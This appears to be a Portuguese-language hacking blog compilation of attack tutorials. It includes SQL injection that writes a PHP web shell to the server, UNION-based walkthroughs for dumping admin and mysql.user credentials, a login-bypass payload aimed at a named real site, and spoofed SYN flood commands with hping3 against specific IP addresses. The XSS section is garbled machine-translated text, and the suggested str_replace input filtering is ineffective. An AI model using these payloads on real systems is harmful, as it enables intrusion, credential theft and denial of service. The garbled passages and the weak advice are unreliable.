como enviar arquivo-virus para um servidor com sql injection
Como enviar um arquivo virus para um servidor com sql injection – Existem varias formas de enviar um arquivo para um servidor, porem neste caso iremos utilizar a forma do sql injection.
A maioria das pessoas sabe que a injeção SQL permite que atacantes para recuperar registros do banco de dados, passe telas de login, alterar conteudo no banco de dados, porem poucas pessoas sabem que é possivel enviar um arquivo para o servidor através do banco de dados, ou seja, caso o servidor esteja vulneravel, o atacante pode injetar um codigo malicioso para enviar um arquivo shell, virus, arquivo em geral para o servidor e atravez do mesmo ter acesso root ao servidor do auvo.
Esquecendo o metodo iniciante para passar por telas de login e senha e ter acesso ao CMS ou area restrita, agora iremos para o metodo um pouco mais avançado.
Comando 1 – INTO OUTFILE – Criar arquivo e escrever no mesmo
MySQL tem um comando embutido que pode ser usado para criar e gravar arquivos de sistema. Este comando tem o seguinte formato:
mysql> select “aqui é o texto que ficará dentro do arquivo, neste caso .TXT” INTO OUTFILE “httpdocs/pasta/arquivo.txt”.
Uma grande desvantagem deste comando é que ele pode ser adicionado a uma consulta existente usando uma SQL para UNIÃO.
Por exemplo, pode ser anexado a seguinte consulta:
select user, password from user where user=”admin” and password=’123′ union
select “text”,2 into outfile “/tmp/file.txt” — ‘
ou seja, podemos adicionar um arquivo de modo muito facil.
Comando 2 – LOAD_FILE – ler arquivos do servidor
MySQL tem um comando interno que pode ser usado para ler arquivos arbitrários. A sintaxe é muito simples. Vamos usar este comando para o plano B.
mysql> select load_file(“path_to_file”);
Este comando arquivo que nem precisa explicar como funciona.
WEBSHELL
WebShell é uma ferramenta muito utilizada nos dias atuais.
Podemos utilizar os comandos acima para criar uma shell, sendo que nesta shell irá executar comandos a partir do navegador web. Muito usado.
Vamos criar um WebShell muito simples que irá executar comandos shell independente do sistema operacional.
Aqui está o código de uma base muito simples em PHP.
<?php echo shell_exec($_GET['cmd']); ?>
para quem não sabe ler programação, pegue um livro já e começe a ler. O comando acima está irá executar comandos a partir de codigos passados via GET, exemplo: http://www.auvo.com.br/shell.php?cmd=ls
O exemplo acima ira listar todos os arquivos e pastas do servidor.
Exploit injeção de SQL – criar web shell
Você precisa adicionar a seguinte string para o comando SQL:
UNION SELECT “<?php echo shell_exec($_GET['cmd']); ?>”, 2,3,4 INTO OUTFILE “/ var / www / html / temp / c.php” -
Algumas explicações:
• 2,3,4 são apenas qualificador que costumava fazer o mesmo número de colunas, como na primeira parte da consulta seleção.
• / var / www / html é um diretório web default nas distribuições RedHat-like (Fedora, CentOS).
BY: invkloip
Read Moreautomagic sql injection download – programa para sql injection
automagic sql injection download – programa para sql injection para download abaixo:
http://scoobygang.org/automagic.zip
Ferramenta automagic sql injection download encontra-se no link:
http://www.securiteam.com/tools/6P00L0AEKQ.html
bY: http://www.segurancaemrede.com
Read Morecomo testar segurança do meu site ou sistema
como testar segurança do meu site – Para as pessoas que possuem site, estamos com uma proposta para testar a seguranca do seu site.
Estamos cobrando 39,00 para verificar falhas de seguranca em seu site.
Para as pessoas que si interessarem, podem entrar em contato através do email: juancarloscunha606@hotmail.com
envie-nos a URL de seu site e faça um teste driver.
Como funciona:
Você passa as URL’s de seu site para nós testar-mos.
encontraremos os bugs em seu site. Para cada site, cobramos R$ 39,00.
Para mostrar-mos a falha, cobramos o valor de R$14,00 por cada falha(falaremos a falha e você irá resolver), Agora caso queira que nós resolva seu problema isso terá que ser orçado a partir de seu codigo fonte.
Aconselho, você testar em somente 1, pois provavelmente as mesmas falhas que estiverem em um terá tambem nos outros.
FORMAS DE PAGAMENTO
PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nos dois: juancarloscunha606@hotmail.com
By: segurancaemrede.com
Read Morecomo tirar um site/host do ar, derrubar site/host com ddos – SYN Flood
Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como retirar um site/host do ar por ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.
Eu usarei 2 metodos para realizar o ataque, um será usando a ferramenta synflooder.c outro sera usando o hping3
Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html
Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3
Para quem usa OpenSUSE basta digitar:
# yast install hping3
Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-
Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc synflooder.c -o synflooder
Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.
# ./synflooder
Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80
Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16
Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.
Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————
ataque com HPING3
O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.
Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo
Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164
O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164
HPING 201.40.22.164 (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
hping in flood mode, no replies will be shown
———————————————————————————————–
Espero que tenham gostado do tutorial.
Read MoreApostila com Técnicas de invasao com sql injection
Criei uma apostila com uma serie de tecnicas para excução do famoso sql injection.
Abaixo está alguns dos assuntos abordados na apostila.
COMO COMPRAR ?
Para conseguir esta apostila Basta fazer um deposito pelo pagseguro na conta do juancarloscunha606@hotmail.com, que logo após enviarei usuario e senha da area restrita para fazer download da apostila.
COMO VOU APRENDER ?
Eu auxiliarei a todos no estudo, e disponibilizarei auvos vulneraveis a ataques.
ASSUNTOS SOBRE O APOSTILA.
Mysql básico
Criando uma query
Principio do sqlinjection
O que é sqlinjection
Teoria de sqlinjection
Regras sqlinjection
Criando um sistema de login E senha para testes
Listar dados do banco de dados com sqlinjection
Burlar uma query
Burlar um sistema de login e senha
Conseguir acesso ao banco de dados
Conseguir privilégios em um sistema
Conseguir dados de um sistema
Usando parâmetro UNION
Inserindo dados no banco de dados sem permissão
Alterando dados do banco de dados sem permissão
Excluindo dados do banco de dados sem permissão
Excluindo tabelas do banco de dados sem permissão
Excluindo database sem permissão
Descobrir nomes de tabelas do banco de dados
Descobrir nome das colunas do banco de dados
Protegendo sistema de login e senha
Protegendo dados do banco
Proteção na query
Emunizando site, sistema… do sqlinjection
Para você aprender com precisão este curso você precisa de saber:
Básico em linguagem de programação
Básico em banco de dados
Read MoreExplorando falha de sql injection basica
Eae galera,
voltei a postar e estou mandando aqui um post explorando um falha de sql injection basica.
http://www.hojetecnologia.com.br/worktable/
Codigo de exploração sql injection: admin’ or usuario like ‘%a%
Para os leigos um tutorial abaixo:
Imagine que o codigo sql de validacao para logar no sistema seja
SELECT usuario, senha FROM usuarios WHERE usuario=’$usuario’ and senha=’$senha’
A falha sql injection acontece quando o programador nao trata as variaveis digitadas pelo usuario.
Uma das melhores formas de tratar é:
$usuario =str_replace(“‘”, “”,$_POST['usuario']);
$usuario =str_replace(“%”, “”,$_POST['usuario']);
$usuario =str_replace(“+”, “”,$_POST['usuario']);
$usuario =str_replace(“(“, “”,$_POST['usuario']);
$usuario =str_replace(“‘-”, “”,$_POST['usuario']);
$usuario =str_replace(“#”, “”,$_POST['usuario']);
O quanto mais os caracteres especiais voce bloquear, melhor é para a seguranca da sua area restrita.
Existem inumeras formas de explorar falhas de sql injection. A que eu usei foi a seguinte
admin’ or usuario like ‘%a%
Explicaçao:
A validacao que tem é:
SELECT usuario, senha FROM usuarios WHERE usuario=’$usuario’ and senha=’$senha’
Ou seja, selecione o usuario e a senha da tabela usuarios em que o usuario seja igual ao usuario digitado pelo usuario e a senha seja igual a senha digitada pelo usuario.
Inserçao do codigo:
SELECT usuario, senha FROM usuarios WHERE usuario=’admin’ or usuario like ‘%a%‘ and senha=’admin’ or usuario like ‘%a%‘
Ou seja,
Selecione o usuario e a senha da tabela usuarios em que o usuario seja igual a admin ou o usuario seja parecido com a letra “a” e a senha seja igual a “admin” ou a senha seja parecida com a letra “a”
Conclusao:
Muito vulneravel esta area restrita. Tao vulneravel que dá até para inserir um usuario atraves deste sql injection.
Read MoreTutorial cross site scripting xss, O que é e como funciona o cross site scripting
T
É uma vulnerabilidade de segurança da informaçao, normalmente encontrados em aplicaçoes web que permitem injecçao codigo malicioso por internautas para a web
paginas visualizadas por outros usuarios. Exemplos dessas, incluiem codigo HTML e codigo
Client-side scripts. Um explorado Cross Site Scripting vulnerabilidade pode ser usada por atacantes para contornar o acesso. Como a mesma origem politica. Vulnerabilidades deste tipo tem side exploradas para embarcaçoes do poderoso phishing e ataques navegador explora. A partir de
2007, cross-site scripting em sites foram realizadas cerca de 80% de todas as vulnerabilidades de
segurança documentadas.
O TERMO Cross Site Scripting, Originou-se do fato de que um site malicioso poderia carregar outro
site em um outro quadro ou janela, em seguida, utilize o javascript para ler / escrever dados no outro site.
Ataques XSS são escritos em uma linguagem script do lado do cliente, na maioria das vezes um
dialeto do ECMAScript (por exemplo, o JavaScript,JScript), por vezes incluindo algumas linguagem de marcação, como HTML ou XHTML também.
Tipos
Tres tipos distintos de XSS vulnerabilidades existentes: Não-persistente, Persistente e com base em DOM(que pode ser persistente ou nao-persistente.
DOM-BASED
O DOM-BASED XSS vulnerabilidade, tambem referidos como locais cross-site scripting, é baseado no
modelo de objeto para representar padrao HTML ou XML chamado o document object Model ou DOM para curto.
Na pratica, explorando esse buraco seria muito semelhante a de nao explorar vulnerabilidades persistentes tipo, exceto em uma situaçao muito importante.
PERSISTENTES
Um vulnerabilidade do ordem de armazenados OU de segunda do uma do como do referido do é do também do persistente do vulnerabilidade XSS, mais poderosos tipos de ataques do ósmio do que do permite
de e. Um tipo – uma vulnerabilidade de 2 XSS existe quando os dados fornecidos a uma aplicação web por um usuário estão armazenados primeiramente persistente no usuário (em uma base de dados, no
filesystem, ou na outra posição), e indicado mais tarde aos usuários em um Web page sem ser codificada usando entidades do HTML. [7] Um exemplo clássico deste é com placas de mensagem em linha, onde são permitidos aos usuários afixar mensagens formatadas do HTML para que outros
usuários leiam. Persistentemente dos armazenados do primeiro do é do usuário do um do por da correia fotorreceptora do aplicação do uma de para dos fornecidos dos dados do ósmio do quando do existe do vulnerabilidade do tipo 2 XSS do Um nenhum servidor (em um de banco dados, arquivos,
local do outro do em da OU) e, posteriormente, HTML dos entidades do usando dos codificados do ser dos sem da correia fotorreceptora do página do uma do em dos usuários do ósmio de para do exibido. É COM quadros de mensagens do disto do clássico do exemplo do Um em linha, mensagens enviar para outros usuários de ler do formatado do HTML dos mensagens de para do permissão do têm dos usuários do ósmio do onde.
NAO-PERSISTENTES
Um vulnerabilidade scripting do reflectido do uma do como do referido do também do é do buraco do
cruz-local do não-persistente, é de e, De Longe, comum dos mais do tipo do. Os certificados do por do imediatamente do usado do é da correia fotorreceptora da Dinamarca do cliente do um do
por dos fornecidos dos dados do ósmio do quando do aparecem dos buracos de Estes fazem o lado
fazem o usuário gerar de para uma página de resultados para o do servidor. O codificação
unvalidated SE do HTML sem do resultante do página do na dos incluídos do estão dos dados do usuário-forneceu, que do permitirá do isto faz o lado faz o código do cliente um dinâmica do página do na do injectada do ser.
Read More
tutorial shadow security scanner, descobrir vulnerabilidades com shadown security scanner
E
Esta ferramenta é uma poderosa ferramenta para analise de rede, que analisa o sistema integramente e procura erros.
Se puder executar mais de 4.000 tipos de auditorias diferentes, é destacar o excelente desempenho que esta ferramenta tem analisando serviços TCP/IP, HTTPS, FTP, UDP, Registro, Windows Media Service, assim como qualquer outro dos que suporta.
Shadow Security Scanner é compatível com Windows, mas também com outros sistemas operacionais (UNIX, Linux, Solaris, HP, CISCO, etc.).
A aplicação permite arquivar os resultados altamente detalhados das auditorias em formato RTF, PDF, HTML, CHM e XML.
Vou dar uma demostraçao somente de como fazer um scanner completo em algum alvo, E como explorar falhas com um exploit.
Primeiramente
Abra o shadow security scanner
Esta é a interface do programa.
Dê um clique, em Scanner:
Nesta pagina dará opções para o estilo do scan… Exemplo: scan completo, scan somente em portas netBios, scan somente em ftp…
No nosso caso, escolheremos scanneamento completo.
Clique em complete Scan -> Next
Nesta pagina dará opções para o scaneamento… scaneamento completo em um só IP, em toda a rede, em um grupo…
No nosso caso escolheremos um só IP.
Clique em: HOST -> Digite o ip -> ADD
Na próxima pagina clique em NEXT
Depois clique em START SCAN para iniciar o scaneamento completo.
Depois disso, clique no ID… um dos três links nas informações…
Aparecerá este site da securityfocus
Agora, basta clicar em EXPLOIT e usar o exploit desejado.
Dependendo do exploit voce nao precisara alterar nada nele.
Tutorial como invadir com SQL Injection (MySQL), sql injection por method $_GET e $_POST, programa para executar o sqlinjection
C
riei este tutorial a fim de demonstrar uma das melhores formas de invasão e uma das mais usadas hoje em dia. Ate porque os programadores de hoje em dia não estão si importando com a segurança do site e suas áreas restritas.
OBS: não vou explicar aqui detalhadamente sobre os códigos sql, pois quem deseja fazer ataques sqlinjection com certeza precisa ter conhecimento sobre banco de dados.
O que é Sql Injection?
É uma vulnerabilidade existente nos dias de hoje, que si usa de uma manipulação em códigos sql. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site ou ate mesmo em campos de text. obtendo, assim, informações confidenciais como logins e senhas, dentre outros.
Hoje em dia são usadas muitas técnicas para explorar um banco de dados de um site servidor… Citarei algumas das técnicas.
1 – Sql Injection
A) Verificar a si existe uma Vulnerabilidade sem programa.
Vou citar um exemplo básico, para si saber si existe uma vulnerabilidade. Suponhamos que existe um site chamado “ALVO”, e esse site contem dados enviados por variáveis URL.
Código:
http://www.alvo.com/news.php?id=5
No caso acima, o nome do site é www.alvo.com, Toda vez que você ver no link de um site o sinal de interrogação seguido de alguma palavra,letra,silaba recebendo algum valor, isso quer diser que existe um dado sendo enviado de uma pagina para outra. Exemplo: ?id=5.
Isso significa que neste caso, a pagina news.php estará recebendo o.
Concerteza na pagina, chamada news.php terá um código, parecido com esse:
$id =$_post[‘id’];
E obviamente terá um código sql, parecido com esse.
Query_rs = “select * from noticias where código=’$id’”
Isso significa que a pagina news.php esta selecionando a noticia em que o codigo da noticia seja igual ao codigo da URL, que seria a variavel $id.
Agora, vamos a parte para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( ‘ ). Abaixo é mostrado a forma como a url ficará.
Código:
http://www.alvo.com/news.php?id=5′
Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection
Erro:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the…
O erro acima diz que a sintase da consulta sql esta incorreta. e pede para você checar o manual correspondente ao SGBD que você está utilizando. “Até parece que você é o administrador do site”
Agora que checamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Agora Iremos aprender a explorar esta vulnerabilidade. Com alguns macetes:
B) – Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.
Utilizaremos uma forma bastante simples para descobrir a quantidade de colunas existentes na tabela. Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY, esse comando é colocado no fim da sintase sql, significa ordenar em formas descendente, ascendente dentre outras a suas consulta.
Mas como utilizar este comando Sql?
Ao final da url você adiciona o comando order by e vai adicionando uma sequência de Colunas, ou seja, você pode acionar a coluna correspondente. Caso queira olhar a coluna 1, ordene assim:
Código:
http://www.alvo.com/news.php?id=5 order by 1
Se não aparecer nenhum erro é por que esta Coluna número 1 existe. Para localizar a quantidade de colunas basta ir tentando ordenar todas as colunas de 1 a infinito. Lembre-se que esta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro dizendo que a Coluna é inexistente no banco de dados.
Código:
http://www.alvo.com/news.php?id=5 order by 1/* <– Sem erro
http://www.alvo.com/news.php?id=5 order by 1,2/* <– Sem erro
http://www.alvo.com/news.php?id=5 order by 1,2,3/* <– Sem erro
http://www.site.com/news.php?id=5 order by 1,2,3,4 <– Com erro
O exemplo acima, é atribuido Colunas (1..2..3..4), no entanto, é mencionado erro na Coluna 4. Conclui-se então que esta Coluna é inexistente e que o banco possui apenas 3 Colunas.
C) – Utilizando a função UNION.
Esta função poderosa é responsável por unir vários dados localizados em Colunas de Tabelas diferentes. “Essa é muito boa”
Vamos utilizar o exemplo abaixo para melhor exemplificar.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3
Explicando a Sql:
O exemplo acima vai possibilitar ao “Injectador” visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.
Código:
…?id … union all select 1,2,3
Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.alvo.com/news.php. Está e a ordem que você atribui ao comando colocado na url do site.
D) – Descobrindo a versão do SGBD (MySql).
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3
Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes no banco. Agora para visualizar a versão do banco é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,@@version,3
Caso não der certo, você receberá uma mensagem de erro semelhante a esta:
Citação:
“union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Para resolver este erro vamos utilizar a função convert(). Exemplo abaixo:
Código:
http://www.alvo.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/
Ou então as funções hex() e unhex();
Código:
http://www.alvo.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/
Com os procedimentos acima, você irá conseguir achar a versão do SGBD MySql.
E) – Obtendo o nome da Coluna/Tabela.
Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:
Geralmente os DBA’s (Administradores de Banco de Dados) utilizam nomes comuns como padronização para suas Colunas/Tabelas como:
Citação:
user, usuario, admin, member, membro, password, passwd, pwd, user_name
Lógico que isto depende bastante de DBA’s e qual tipo de padronização ele estiver utilizando.
Na consulta abaixo o “Injectador” bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,2,3 from admin
Observe que acima a query diz: “Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do usuário admin”.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin
Caso apareça erro, vá mudando o nome da coluna… afinal é a técnica da tentativa e erro.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin/
Acima, observe que a consulta começa a ficar refinada: “Mostre-me os valores Coluna/Tabelas 1, o nome do usuário e 3 do usuário admin”. Ou seja, suponha que o DBA tenha criado um banco onde as ele separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,username, password from admin
Caso a consulta der certo, na tela aparecerá o nome do usuário e a senha. Esta senha aparecerá na tela tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvido o banco.
Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Dependendo do campo, fica a seu critério inserir em hexadecimal (0x3a) ou utilizando o padrão Ascii (char(58)).
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Na tela já aparecerá os valores com o nome do usuário administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra..
Dica: Quando está difícil para achar o nome da Coluna/Tabela, sempre é bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
F) – MySql 5.
Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.
Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas do banco. É este arquivo que será o nosso alvo.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.
Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.
Observer abaixo que é colocado como limite 0, 1.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
OBS: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de você, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então você deveria acrescentar uma por uma até achar… 1, 2; …, …; 42, 43.
Espero que tenham entendido esta parte.
Para obter o nome das colunas, também é utilizado a mesma lógica. Só que agora no arquivo information_schema.columns.
Código:
http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos usuário pode-se fazer a consulta abaixo:
Código:
http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/
Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de usuários.
Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().
Código:
http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
Ferramenta de auxílio
SQL Injection 1.2 + Firefox.
https://addons.mozilla.org/pt-BR/firefox/addon/6727
Para dá apoio/auxílio na injeção dos códigos da SQL Injection, aqui é mostrado um complemento do Firefox que pode ajudá-lo bastante nesta tarefa.
O SQL Injection 1.2 que é uma complemento que nos ajuda a inserir códigos tanto em Post quanto em Get. Além de você pode memorizar todas as entradas que você adquirir, sem a necessidade de utilizar o Crtl + c e Crtl + v.
Abaixo as ilustrações mostram a facilidade de uso da ferramenta.
Acima simplesmente pedimos para mostrar o usuário, a senha e o email.
Isto é um exemplo de Sql Injection Avançado. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql.
Para quem sabe manejar bem o sql, concerteza que com este simples tutorial, aprenderá coisas a mais do que estou ensinando. Aprenderá que para fazer um sql injection basta injetar um código em outro código.
Espero que todos tenham entendido pelo menos a essência da coisa.
A imagem 01 mostra o ícone no campo inferior do Browser. Para darmos início a execução do complemento é necessário dar um clique em cima do ícone (cadeado).
A imagem 02 mostra o complemento em si. Observe que não tem muito mistério, um campo para a escolha da String/Query e dois botões de escolha.
A imagem 3 mostra que o complemento já vem com algumas Strings, as Query’s que aparecem eu mesmo adicionei.
Mas como funciona?
A imagem 04 mostra que o SQL Injection 1.2 já fez a limitação dos campos que podem vir a receber os Strings, que na ilustração acima correspondem a Usuário, Senha, Entrar.
Para inserir é necessário que você clique em cima de qualquer um dos 3 campos do site.
A imagem 05 aparece logo após você clicar no campo desejado. Então você pode fazer a escolha de fazer a injeção por POST ou por GET.
Na imagem 06 você agora deve escolher em qual campo será inserido a String. Para isto você deve optar em clicar em um dos dois botões:
O botão Injection Code possibilita inserir a String apenas no input que você clicou anteriormente.
O botão Injection in all possibilita que a String seja inserida em todos os campos do site.
Observe que eu clique no botão Injection in all.
Pronto, logo após para iniciar a injeção basta clicar no tão Submit this form.
_____________________________________________________________________
Existem também a possibilidade de você criar e salvar as suas próprias Strings/Querys.
Para isto, basta você clicar na ícone do SQL Injection 1.2, mostrado na ilustração 01, e adicionar conforme mostrado na figura acima.
Esta ferramenta ajuda muito aqueles que são fanáticos em sql injection, assim como me ajuda muito.
Este programa é simples e pratico.
Aqueles que tiverem alguma duvida, basta me contactar.
Parceiros
